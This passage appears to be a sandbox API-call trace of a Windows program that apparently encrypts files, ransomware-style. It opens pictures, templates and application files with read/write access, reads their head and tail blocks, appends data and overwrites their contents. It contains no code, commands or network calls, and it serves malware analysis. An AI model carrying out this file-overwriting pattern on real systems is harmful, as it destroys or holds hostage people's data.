hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4d3f [0065.262] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.263] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4d3f [0065.263] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.264] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0065.264] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.264] CloseHandle (hObject=0x1dc) returned 1 [0065.279] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1d51 [0065.280] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.280] ReleaseMutex (hMutex=0x168) returned 1 [0065.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.jpg", lpUsedDefaultChar=0x0) returned 9 [0065.280] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1d51, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1d51, lpOverlapped=0x0) returned 1 [0065.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0065.282] WriteFile (in: hFile=0x1dc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x22d9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2b1f2d0*=0x22d9, lpOverlapped=0x0) returned 1 [0065.282] CloseHandle (hObject=0x1dc) returned 1 [0065.285] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x97958 [0065.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.285] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.286] ReleaseMutex (hMutex=0x168) returned 1 [0065.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tulips.jpg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0065.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tulips.jpg", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tulips.jpg", lpUsedDefaultChar=0x0) returned 10 [0065.286] ReadFile (in: hFile=0x1dc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0065.288] ReadFile (in: hFile=0x1dc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.289] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x96958 [0065.289] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.291] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x96958 [0065.292] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.292] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0065.292] WriteFile (in: hFile=0x1dc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0065.292] WriteFile (in: hFile=0x1dc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0065.292] CloseHandle (hObject=0x1dc) returned 1 [0065.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.317] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.317] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x9a5b [0065.317] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0065.317] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.317] ReleaseMutex (hMutex=0x168) returned 1 [0065.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql90.xsl", lpUsedDefaultChar=0x0) returned 9 [0065.317] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.320] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x8a5b [0065.320] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.320] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x8a5b [0065.320] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.321] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0065.321] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.321] CloseHandle (hObject=0x1dc) returned 1 [0065.324] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\absolutetelnet.exe" (normalized: "c:\\program files\\msbuild\\absolutetelnet.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.325] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\absolutetelnet.exe", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files\\MSBuild\\absolutetelnet.exe", lpFilePart=0x2b1f690*="absolutetelnet.exe") returned 0x2b [0065.325] GetLastError () returned 0x20 [0065.325] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x51 [0065.325] LocalFree (hMem=0x696d00) returned 0x0 [0065.325] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.325] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0065.326] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0065.326] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0065.326] GetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\absolutetelnet.exe" (normalized: "c:\\program files\\msbuild\\absolutetelnet.exe")) returned 0x20 [0065.326] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwdui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", lpFilePart=0x2b1f690*="jnwdui.dll.mui") returned 0x35 [0065.606] GetLastError () returned 0x5 [0065.606] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0065.606] LocalFree (hMem=0x69e2b0) returned 0x0 [0065.606] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.606] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0065.606] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0065.606] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0065.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwdui.dll.mui")) returned 0x20 [0065.608] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" (normalized: "c:\\program files\\windows journal\\templates\\blank.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", lpFilePart=0x2b1f690*="blank.jtp") returned 0x34 [0065.958] GetLastError () returned 0x5 [0065.958] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0065.958] LocalFree (hMem=0x69e2b0) returned 0x0 [0065.958] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.958] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0065.959] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0065.959] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0065.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" (normalized: "c:\\program files\\windows journal\\templates\\blank.jtp")) returned 0x20 [0065.961] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" (normalized: "c:\\program files\\windows journal\\templates\\seyes.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpFilePart=0x2b1f690*="Seyes.jtp") returned 0x34 [0066.103] GetLastError () returned 0x5 [0066.103] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0066.177] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.177] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.177] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0066.178] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0066.178] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0066.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" (normalized: "c:\\program files\\windows journal\\templates\\seyes.jtp")) returned 0x20 [0066.179] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files\\windows mail\\wabmig.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\wabmig.exe", lpFilePart=0x2b1f690*="wabmig.exe") returned 0x28 [0066.180] GetLastError () returned 0x5 [0066.180] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0066.180] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.181] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.181] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0066.181] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0066.181] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0066.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files\\windows mail\\wabmig.exe")) returned 0x20 [0066.181] CreateFileW (lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe" (normalized: "c:\\program files\\windows portable devices\\thunderbird.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.182] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", lpFilePart=0x2b1f690*="thunderbird.exe") returned 0x39 [0066.182] GetLastError () returned 0x20 [0066.182] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x51 [0066.182] LocalFree (hMem=0x696d00) returned 0x0 [0066.182] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.182] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0066.182] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0066.182] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0066.182] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe" (normalized: "c:\\program files\\windows portable devices\\thunderbird.exe")) returned 0x20 [0066.183] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0066.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4289 [0066.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.184] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.184] ReleaseMutex (hMutex=0x168) returned 1 [0066.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Leggimi.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Leggimi.htm", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Leggimi.htm", lpUsedDefaultChar=0x0) returned 11 [0066.185] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3289 [0066.187] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3289 [0066.188] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.188] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0066.188] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.188] CloseHandle (hObject=0x1dc) returned 1 [0066.190] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32Info.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32info.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0066.191] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.191] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x45a0 [0066.191] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.191] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.191] ReleaseMutex (hMutex=0x168) returned 1 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroRd32Info.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0066.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroRd32Info.exe", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroRd32Info.exe", lpUsedDefaultChar=0x0) returned 16 [0066.191] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: 